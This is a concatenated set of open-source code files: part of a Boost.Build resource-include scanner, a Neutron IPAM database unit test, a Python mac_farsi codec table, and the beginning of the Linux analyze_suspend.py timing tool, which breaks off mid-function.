angle = regex.transform(matches, "#include[ ]*<([^<]+)>")
quoted = regex.transform(matches, "#include[ ]*\"([^\"]+)\"")
res = regex.transform(matches,
"[^ ]+[ ]+(BITMAP|CURSOR|FONT|ICON|MESSAGETABLE|RT_MANIFEST)" +\
"[ ]+(([^ \"]+)|\"([^\"]+)\")", [3, 4])
# Icons and other includes may be referenced as
#
# IDR_MAINFRAME ICON "res\\icon.ico"
#
# so we have to normalize the doubled backslashes (the substitution below
# replaces them with forward slashes).
res = [ re.sub(r'\\\\', '/', match) for match in res ]
# CONSIDER: the new scoping rules seem to defeat "on target" variables.
g = bjam.call('get-target-variable', target, 'HDRGRIST')
b = os.path.normpath(os.path.dirname(binding))
# Attach binding of including file to included targets.
# When the target is created directly from a virtual target
# this extra information is unnecessary. But in other
# cases, it allows us to distinguish between two headers of the
# same name included from different places.
# We don't need this extra information for angle includes,
# since they should not depend on the including file (we can't
# get literal "." in include path).
g2 = g + "#" + b
g = "<" + g + ">"
g2 = "<" + g2 + ">"
angle = [g + x for x in angle]
quoted = [g2 + x for x in quoted]
res = [g2 + x for x in res]
all = angle + quoted
bjam.call('mark-included', target, all)
engine = get_manager().engine()
engine.add_dependency(target, res)
bjam.call('NOCARE', all + res)
engine.set_target_variable(angle, 'SEARCH', ungrist(self.includes))
engine.set_target_variable(quoted, 'SEARCH', b + ungrist(self.includes))
engine.set_target_variable(res, 'SEARCH', b + ungrist(self.includes))
# Just propagate the current scanner to the includes, in the hope
# that the includes do not change scanners.
get_manager().scanners().propagate(self, angle + quoted)
scanner.register(ResScanner, 'include')
type.set_scanner('RC', ResScanner)
|
gpl-2.0
|
silenci/neutron
|
neutron/tests/unit/ipam/drivers/neutrondb_ipam/test_db_api.py
|
15
|
7533
|
# Copyright 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from neutron import context
from neutron.ipam.drivers.neutrondb_ipam import db_api
from neutron.ipam.drivers.neutrondb_ipam import db_models
from neutron.tests.unit import testlib_api
class TestIpamSubnetManager(testlib_api.SqlTestCase):
"""Test case for SubnetManager DB helper class"""
def setUp(self):
super(TestIpamSubnetManager, self).setUp()
self.ctx = context.get_admin_context()
self.neutron_subnet_id = uuidutils.generate_uuid()
self.ipam_subnet_id = uuidutils.generate_uuid()
self.subnet_ip = '1.2.3.4'
self.single_pool = ('1.2.3.4', '1.2.3.10')
self.multi_pool = (('1.2.3.2', '1.2.3.12'), ('1.2.3.15', '1.2.3.24'))
self.subnet_manager = db_api.IpamSubnetManager(self.ipam_subnet_id,
self.neutron_subnet_id)
self.subnet_manager_id = self.subnet_manager.create(self.ctx.session)
self.ctx.session.flush()
def test_create(self):
self.assertEqual(self.ipam_subnet_id, self.subnet_manager_id)
subnets = self.ctx.session.query(db_models.IpamSubnet).filter_by(
id=self.ipam_subnet_id).all()
self.assertEqual(1, len(subnets))
def test_remove(self):
count = db_api.IpamSubnetManager.delete(self.ctx.session,
self.neutron_subnet_id)
self.assertEqual(1, count)
subnets = self.ctx.session.query(db_models.IpamSubnet).filter_by(
id=self.ipam_subnet_id).all()
self.assertEqual(0, len(subnets))
def test_remove_non_existent_subnet(self):
count = db_api.IpamSubnetManager.delete(self.ctx.session,
'non-existent')
self.assertEqual(0, count)
def _create_pools(self, pools):
db_pools = []
for pool in pools:
db_pool = self.subnet_manager.create_pool(self.ctx.session,
pool[0],
pool[1])
db_pools.append(db_pool)
return db_pools
def _validate_ips(self, pools, db_pool):
self.assertTrue(
any(pool == (db_pool.first_ip, db_pool.last_ip) for pool in pools))
def test_create_pool(self):
db_pools = self._create_pools([self.single_pool])
ipam_pool = self.ctx.session.query(db_models.IpamAllocationPool).\
filter_by(ipam_subnet_id=self.ipam_subnet_id).first()
self._validate_ips([self.single_pool], ipam_pool)
range = self.ctx.session.query(db_models.IpamAvailabilityRange).\
filter_by(allocation_pool_id=db_pools[0].id).first()
self._validate_ips([self.single_pool], range)
def _test_get_first_range(self, locking):
self._create_pools(self.multi_pool)
range = self.subnet_manager.get_first_range(self.ctx.session,
locking=locking)
self._validate_ips(self.multi_pool, range)
def test_get_first_range(self):
self._test_get_first_range(False)
def test_get_first_range_locking(self):
self._test_get_first_range(True)
def test_list_ranges_by_subnet_id(self):
self._create_pools(self.multi_pool)
db_ranges = self.subnet_manager.list_ranges_by_subnet_id(
self.ctx.session,
self.ipam_subnet_id).all()
self.assertEqual(2, len(db_ranges))
self.assertEqual(db_models.IpamAvailabilityRange, type(db_ranges[0]))
def test_list_ranges_by_allocation_pool(self):
db_pools = self._create_pools([self.single_pool])
# generate ids for allocation pools on flush
self.ctx.session.flush()
db_ranges = self.subnet_manager.list_ranges_by_allocation_pool(
self.ctx.session,
db_pools[0].id).all()
self.assertEqual(1, len(db_ranges))
self.assertEqual(db_models.IpamAvailabilityRange, type(db_ranges[0]))
self._validate_ips([self.single_pool], db_ranges[0])
def test_create_range(self):
self._create_pools([self.single_pool])
pool = self.ctx.session.query(db_models.IpamAllocationPool).\
filter_by(ipam_subnet_id=self.ipam_subnet_id).first()
self._validate_ips([self.single_pool], pool)
allocation_pool_id = pool.id
# delete the range
db_range = self.subnet_manager.list_ranges_by_allocation_pool(
self.ctx.session,
pool.id).first()
self._validate_ips([self.single_pool], db_range)
self.ctx.session.delete(db_range)
# create a new range
range_start = '1.2.3.5'
range_end = '1.2.3.9'
new_range = self.subnet_manager.create_range(self.ctx.session,
allocation_pool_id,
range_start,
range_end)
self.assertEqual(range_start, new_range.first_ip)
self.assertEqual(range_end, new_range.last_ip)
def test_check_unique_allocation(self):
self.assertTrue(self.subnet_manager.check_unique_allocation(
self.ctx.session, self.subnet_ip))
def test_check_unique_allocation_negative(self):
self.subnet_manager.create_allocation(self.ctx.session,
self.subnet_ip)
self.assertFalse(self.subnet_manager.check_unique_allocation(
self.ctx.session, self.subnet_ip))
def test_list_allocations(self):
ips = ['1.2.3.4', '1.2.3.6', '1.2.3.7']
for ip in ips:
self.subnet_manager.create_allocation(self.ctx.session, ip)
allocs = self.subnet_manager.list_allocations(self.ctx.session).all()
self.assertEqual(len(ips), len(allocs))
for allocation in allocs:
self.assertIn(allocation.ip_address, ips)
def _test_create_allocation(self):
self.subnet_manager.create_allocation(self.ctx.session,
self.subnet_ip)
alloc = self.ctx.session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self.ipam_subnet_id).all()
self.assertEqual(1, len(alloc))
self.assertEqual(self.subnet_ip, alloc[0].ip_address)
return alloc
def test_create_allocation(self):
self._test_create_allocation()
def test_delete_allocation(self):
allocs = self._test_create_allocation()
self.subnet_manager.delete_allocation(self.ctx.session,
allocs[0].ip_address)
allocs = self.ctx.session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self.ipam_subnet_id).all()
self.assertEqual(0, len(allocs))
|
apache-2.0
|
makermade/arm_android-19_arm-linux-androideabi-4.8
|
lib/python2.7/encodings/mac_farsi.py
|
593
|
15426
|
""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-farsi',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE, left-right
u'!' # 0x21 -> EXCLAMATION MARK, left-right
u'"' # 0x22 -> QUOTATION MARK, left-right
u'#' # 0x23 -> NUMBER SIGN, left-right
u'$' # 0x24 -> DOLLAR SIGN, left-right
u'%' # 0x25 -> PERCENT SIGN, left-right
u'&' # 0x26 -> AMPERSAND, left-right
u"'" # 0x27 -> APOSTROPHE, left-right
u'(' # 0x28 -> LEFT PARENTHESIS, left-right
u')' # 0x29 -> RIGHT PARENTHESIS, left-right
u'*' # 0x2A -> ASTERISK, left-right
u'+' # 0x2B -> PLUS SIGN, left-right
u',' # 0x2C -> COMMA, left-right; in Arabic-script context, displayed as 0x066C ARABIC THOUSANDS SEPARATOR
u'-' # 0x2D -> HYPHEN-MINUS, left-right
u'.' # 0x2E -> FULL STOP, left-right; in Arabic-script context, displayed as 0x066B ARABIC DECIMAL SEPARATOR
u'/' # 0x2F -> SOLIDUS, left-right
u'0' # 0x30 -> DIGIT ZERO; in Arabic-script context, displayed as 0x06F0 EXTENDED ARABIC-INDIC DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE; in Arabic-script context, displayed as 0x06F1 EXTENDED ARABIC-INDIC DIGIT ONE
u'2' # 0x32 -> DIGIT TWO; in Arabic-script context, displayed as 0x06F2 EXTENDED ARABIC-INDIC DIGIT TWO
u'3' # 0x33 -> DIGIT THREE; in Arabic-script context, displayed as 0x06F3 EXTENDED ARABIC-INDIC DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR; in Arabic-script context, displayed as 0x06F4 EXTENDED ARABIC-INDIC DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE; in Arabic-script context, displayed as 0x06F5 EXTENDED ARABIC-INDIC DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX; in Arabic-script context, displayed as 0x06F6 EXTENDED ARABIC-INDIC DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN; in Arabic-script context, displayed as 0x06F7 EXTENDED ARABIC-INDIC DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT; in Arabic-script context, displayed as 0x06F8 EXTENDED ARABIC-INDIC DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE; in Arabic-script context, displayed as 0x06F9 EXTENDED ARABIC-INDIC DIGIT NINE
u':' # 0x3A -> COLON, left-right
u';' # 0x3B -> SEMICOLON, left-right
u'<' # 0x3C -> LESS-THAN SIGN, left-right
u'=' # 0x3D -> EQUALS SIGN, left-right
u'>' # 0x3E -> GREATER-THAN SIGN, left-right
u'?' # 0x3F -> QUESTION MARK, left-right
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET, left-right
u'\\' # 0x5C -> REVERSE SOLIDUS, left-right
u']' # 0x5D -> RIGHT SQUARE BRACKET, left-right
u'^' # 0x5E -> CIRCUMFLEX ACCENT, left-right
u'_' # 0x5F -> LOW LINE, left-right
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET, left-right
u'|' # 0x7C -> VERTICAL LINE, left-right
u'}' # 0x7D -> RIGHT CURLY BRACKET, left-right
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xa0' # 0x81 -> NO-BREAK SPACE, right-left
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u06ba' # 0x8B -> ARABIC LETTER NOON GHUNNA
u'\xab' # 0x8C -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK, right-left
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\u2026' # 0x93 -> HORIZONTAL ELLIPSIS, right-left
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xbb' # 0x98 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK, right-left
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0x9B -> DIVISION SIGN, right-left
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u' ' # 0xA0 -> SPACE, right-left
u'!' # 0xA1 -> EXCLAMATION MARK, right-left
u'"' # 0xA2 -> QUOTATION MARK, right-left
u'#' # 0xA3 -> NUMBER SIGN, right-left
u'$' # 0xA4 -> DOLLAR SIGN, right-left
u'\u066a' # 0xA5 -> ARABIC PERCENT SIGN
u'&' # 0xA6 -> AMPERSAND, right-left
u"'" # 0xA7 -> APOSTROPHE, right-left
u'(' # 0xA8 -> LEFT PARENTHESIS, right-left
u')' # 0xA9 -> RIGHT PARENTHESIS, right-left
u'*' # 0xAA -> ASTERISK, right-left
u'+' # 0xAB -> PLUS SIGN, right-left
u'\u060c' # 0xAC -> ARABIC COMMA
u'-' # 0xAD -> HYPHEN-MINUS, right-left
u'.' # 0xAE -> FULL STOP, right-left
u'/' # 0xAF -> SOLIDUS, right-left
u'\u06f0' # 0xB0 -> EXTENDED ARABIC-INDIC DIGIT ZERO, right-left (need override)
u'\u06f1' # 0xB1 -> EXTENDED ARABIC-INDIC DIGIT ONE, right-left (need override)
u'\u06f2' # 0xB2 -> EXTENDED ARABIC-INDIC DIGIT TWO, right-left (need override)
u'\u06f3' # 0xB3 -> EXTENDED ARABIC-INDIC DIGIT THREE, right-left (need override)
u'\u06f4' # 0xB4 -> EXTENDED ARABIC-INDIC DIGIT FOUR, right-left (need override)
u'\u06f5' # 0xB5 -> EXTENDED ARABIC-INDIC DIGIT FIVE, right-left (need override)
u'\u06f6' # 0xB6 -> EXTENDED ARABIC-INDIC DIGIT SIX, right-left (need override)
u'\u06f7' # 0xB7 -> EXTENDED ARABIC-INDIC DIGIT SEVEN, right-left (need override)
u'\u06f8' # 0xB8 -> EXTENDED ARABIC-INDIC DIGIT EIGHT, right-left (need override)
u'\u06f9' # 0xB9 -> EXTENDED ARABIC-INDIC DIGIT NINE, right-left (need override)
u':' # 0xBA -> COLON, right-left
u'\u061b' # 0xBB -> ARABIC SEMICOLON
u'<' # 0xBC -> LESS-THAN SIGN, right-left
u'=' # 0xBD -> EQUALS SIGN, right-left
u'>' # 0xBE -> GREATER-THAN SIGN, right-left
u'\u061f' # 0xBF -> ARABIC QUESTION MARK
u'\u274a' # 0xC0 -> EIGHT TEARDROP-SPOKED PROPELLER ASTERISK, right-left
u'\u0621' # 0xC1 -> ARABIC LETTER HAMZA
u'\u0622' # 0xC2 -> ARABIC LETTER ALEF WITH MADDA ABOVE
u'\u0623' # 0xC3 -> ARABIC LETTER ALEF WITH HAMZA ABOVE
u'\u0624' # 0xC4 -> ARABIC LETTER WAW WITH HAMZA ABOVE
u'\u0625' # 0xC5 -> ARABIC LETTER ALEF WITH HAMZA BELOW
u'\u0626' # 0xC6 -> ARABIC LETTER YEH WITH HAMZA ABOVE
u'\u0627' # 0xC7 -> ARABIC LETTER ALEF
u'\u0628' # 0xC8 -> ARABIC LETTER BEH
u'\u0629' # 0xC9 -> ARABIC LETTER TEH MARBUTA
u'\u062a' # 0xCA -> ARABIC LETTER TEH
u'\u062b' # 0xCB -> ARABIC LETTER THEH
u'\u062c' # 0xCC -> ARABIC LETTER JEEM
u'\u062d' # 0xCD -> ARABIC LETTER HAH
u'\u062e' # 0xCE -> ARABIC LETTER KHAH
u'\u062f' # 0xCF -> ARABIC LETTER DAL
u'\u0630' # 0xD0 -> ARABIC LETTER THAL
u'\u0631' # 0xD1 -> ARABIC LETTER REH
u'\u0632' # 0xD2 -> ARABIC LETTER ZAIN
u'\u0633' # 0xD3 -> ARABIC LETTER SEEN
u'\u0634' # 0xD4 -> ARABIC LETTER SHEEN
u'\u0635' # 0xD5 -> ARABIC LETTER SAD
u'\u0636' # 0xD6 -> ARABIC LETTER DAD
u'\u0637' # 0xD7 -> ARABIC LETTER TAH
u'\u0638' # 0xD8 -> ARABIC LETTER ZAH
u'\u0639' # 0xD9 -> ARABIC LETTER AIN
u'\u063a' # 0xDA -> ARABIC LETTER GHAIN
u'[' # 0xDB -> LEFT SQUARE BRACKET, right-left
u'\\' # 0xDC -> REVERSE SOLIDUS, right-left
u']' # 0xDD -> RIGHT SQUARE BRACKET, right-left
u'^' # 0xDE -> CIRCUMFLEX ACCENT, right-left
u'_' # 0xDF -> LOW LINE, right-left
u'\u0640' # 0xE0 -> ARABIC TATWEEL
u'\u0641' # 0xE1 -> ARABIC LETTER FEH
u'\u0642' # 0xE2 -> ARABIC LETTER QAF
u'\u0643' # 0xE3 -> ARABIC LETTER KAF
u'\u0644' # 0xE4 -> ARABIC LETTER LAM
u'\u0645' # 0xE5 -> ARABIC LETTER MEEM
u'\u0646' # 0xE6 -> ARABIC LETTER NOON
u'\u0647' # 0xE7 -> ARABIC LETTER HEH
u'\u0648' # 0xE8 -> ARABIC LETTER WAW
u'\u0649' # 0xE9 -> ARABIC LETTER ALEF MAKSURA
u'\u064a' # 0xEA -> ARABIC LETTER YEH
u'\u064b' # 0xEB -> ARABIC FATHATAN
u'\u064c' # 0xEC -> ARABIC DAMMATAN
u'\u064d' # 0xED -> ARABIC KASRATAN
u'\u064e' # 0xEE -> ARABIC FATHA
u'\u064f' # 0xEF -> ARABIC DAMMA
u'\u0650' # 0xF0 -> ARABIC KASRA
u'\u0651' # 0xF1 -> ARABIC SHADDA
u'\u0652' # 0xF2 -> ARABIC SUKUN
u'\u067e' # 0xF3 -> ARABIC LETTER PEH
u'\u0679' # 0xF4 -> ARABIC LETTER TTEH
u'\u0686' # 0xF5 -> ARABIC LETTER TCHEH
u'\u06d5' # 0xF6 -> ARABIC LETTER AE
u'\u06a4' # 0xF7 -> ARABIC LETTER VEH
u'\u06af' # 0xF8 -> ARABIC LETTER GAF
u'\u0688' # 0xF9 -> ARABIC LETTER DDAL
u'\u0691' # 0xFA -> ARABIC LETTER RREH
u'{' # 0xFB -> LEFT CURLY BRACKET, right-left
u'|' # 0xFC -> VERTICAL LINE, right-left
u'}' # 0xFD -> RIGHT CURLY BRACKET, right-left
u'\u0698' # 0xFE -> ARABIC LETTER JEH
u'\u06d2' # 0xFF -> ARABIC LETTER YEH BARREE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
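# Quick sanity check (a sketch; uses the tables defined above):
#   assert codecs.charmap_encode(u'\u0627', 'strict', encoding_table)[0] == '\xc7'
#   assert codecs.charmap_decode('\xc7', 'strict', decoding_table)[0] == u'\u0627'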
|
gpl-2.0
|
klock-android/linux
|
scripts/analyze_suspend.py
|
1537
|
120394
|
#!/usr/bin/python
#
# Tool for analyzing suspend/resume timing
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors:
# Todd Brandt <todd.e.brandt@linux.intel.com>
#
# Description:
# This tool is designed to assist kernel and OS developers in optimizing
# their linux stack's suspend/resume time. Using a kernel image built
# with a few extra options enabled, the tool will execute a suspend and
# will capture dmesg and ftrace data until resume is complete. This data
# is transformed into a device timeline and a callgraph to give a quick
# and detailed view of which devices and callbacks are taking the most
# time in suspend/resume. The output is a single html file which can be
# viewed in firefox or chrome.
#
# The following kernel build options are required:
# CONFIG_PM_DEBUG=y
# CONFIG_PM_SLEEP_DEBUG=y
# CONFIG_FTRACE=y
# CONFIG_FUNCTION_TRACER=y
# CONFIG_FUNCTION_GRAPH_TRACER=y
#
# For kernel versions older than 3.15:
# The following additional kernel parameters are required:
# (e.g. in file /etc/default/grub)
# GRUB_CMDLINE_LINUX_DEFAULT="... initcall_debug log_buf_len=16M ..."
#
# ----------------- LIBRARIES --------------------
import sys
import time
import os
import string
import re
import platform
from datetime import datetime
import struct
# ----------------- CLASSES --------------------
# Class: SystemValues
# Description:
# A global, single-instance container used to
# store system values and test parameters
class SystemValues:
version = 3.0
verbose = False
testdir = '.'
tpath = '/sys/kernel/debug/tracing/'
fpdtpath = '/sys/firmware/acpi/tables/FPDT'
epath = '/sys/kernel/debug/tracing/events/power/'
traceevents = [
'suspend_resume',
'device_pm_callback_end',
'device_pm_callback_start'
]
modename = {
'freeze': 'Suspend-To-Idle (S0)',
'standby': 'Power-On Suspend (S1)',
'mem': 'Suspend-to-RAM (S3)',
'disk': 'Suspend-to-disk (S4)'
}
mempath = '/dev/mem'
powerfile = '/sys/power/state'
suspendmode = 'mem'
hostname = 'localhost'
prefix = 'test'
teststamp = ''
dmesgfile = ''
ftracefile = ''
htmlfile = ''
rtcwake = False
rtcwaketime = 10
rtcpath = ''
android = False
adb = 'adb'
devicefilter = []
stamp = 0
execcount = 1
x2delay = 0
usecallgraph = False
usetraceevents = False
usetraceeventsonly = False
notestrun = False
altdevname = dict()
postresumetime = 0
tracertypefmt = '# tracer: (?P<t>.*)'
firmwarefmt = '# fwsuspend (?P<s>[0-9]*) fwresume (?P<r>[0-9]*)$'
postresumefmt = '# post resume time (?P<t>[0-9]*)$'
stampfmt = '# suspend-(?P<m>[0-9]{2})(?P<d>[0-9]{2})(?P<y>[0-9]{2})-'+\
'(?P<H>[0-9]{2})(?P<M>[0-9]{2})(?P<S>[0-9]{2})'+\
' (?P<host>.*) (?P<mode>.*) (?P<kernel>.*)$'
def __init__(self):
self.hostname = platform.node()
if(self.hostname == ''):
self.hostname = 'localhost'
rtc = "rtc0"
if os.path.exists('/dev/rtc'):
rtc = os.readlink('/dev/rtc')
rtc = '/sys/class/rtc/'+rtc
if os.path.exists(rtc) and os.path.exists(rtc+'/date') and \
os.path.exists(rtc+'/time') and os.path.exists(rtc+'/wakealarm'):
self.rtcpath = rtc
def setOutputFile(self):
if((self.htmlfile == '') and (self.dmesgfile != '')):
m = re.match('(?P<name>.*)_dmesg\.txt$', self.dmesgfile)
if(m):
self.htmlfile = m.group('name')+'.html'
if((self.htmlfile == '') and (self.ftracefile != '')):
m = re.match('(?P<name>.*)_ftrace\.txt$', self.ftracefile)
if(m):
self.htmlfile = m.group('name')+'.html'
if(self.htmlfile == ''):
self.htmlfile = 'output.html'
def initTestOutput(self, subdir):
if(not self.android):
self.prefix = self.hostname
v = open('/proc/version', 'r').read().strip()
kver = string.split(v)[2]
else:
self.prefix = 'android'
v = os.popen(self.adb+' shell cat /proc/version').read().strip()
kver = string.split(v)[2]
testtime = datetime.now().strftime('suspend-%m%d%y-%H%M%S')
if(subdir != "."):
self.testdir = subdir+"/"+testtime
else:
self.testdir = testtime
self.teststamp = \
'# '+testtime+' '+self.prefix+' '+self.suspendmode+' '+kver
self.dmesgfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_dmesg.txt'
self.ftracefile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_ftrace.txt'
self.htmlfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'.html'
os.mkdir(self.testdir)
def setDeviceFilter(self, devnames):
self.devicefilter = string.split(devnames)
def rtcWakeAlarm(self):
os.system('echo 0 > '+self.rtcpath+'/wakealarm')
outD = open(self.rtcpath+'/date', 'r').read().strip()
